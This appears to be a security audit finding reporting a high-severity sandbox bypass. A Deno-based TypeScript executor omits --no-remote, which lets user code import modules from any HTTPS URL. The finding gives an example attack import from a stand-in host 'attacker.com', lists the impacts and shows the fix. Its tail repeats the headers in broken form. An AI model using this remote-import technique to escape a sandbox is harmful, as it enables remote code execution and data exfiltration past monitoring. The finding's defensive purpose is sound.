⚠️ HIGH SEVERITY - Sandbox Bypass
Severity: P1
Location: src/sandbox-executor.ts:249-289
CONFIRMED:
TypeScript executor never passes --no-remote to Deno, allowing remote imports:
// Deno args built WITHOUT --no-remote
const denoArgs = [
'run',
'--no-prompt',
'--allow-net=localhost,...', // ← Allows localhost MCP proxy
// MISSING: --no-remote
wrappedCodeFile
];
Attack:
// User code can import from ANY HTTPS URL
import { exploit } from 'https://attacker.com/malicious.ts';
// Bypasses:
// - permissions.net allowlist (Deno fetches modules separately)
// - SSRF protection (only checks callMCPTool hosts)
// - Tool allowlist (remote code has full permissions)Impact:
- Remote code execution from any HTTPS URL
- Bypasses network permission checks
- Unmonitored egress to attacker domains
- Data exfiltration channel
Fix:
const denoArgs = [
'run',
'--no-prompt',
'--no-remote', // ← Block remote imports
'--allow-net=localhost,...',
wrappedCodeFile
];
// OR use import maps for allowed remotes:
// --import-map=import-map.json
References:
Severity: P1
Location:
src/sandbox-executor.ts:249-289CONFIRMED:
TypeScript executor never passes
--no-remoteto Deno, allowing remote imports:Attack:
Impact:
Fix:
References: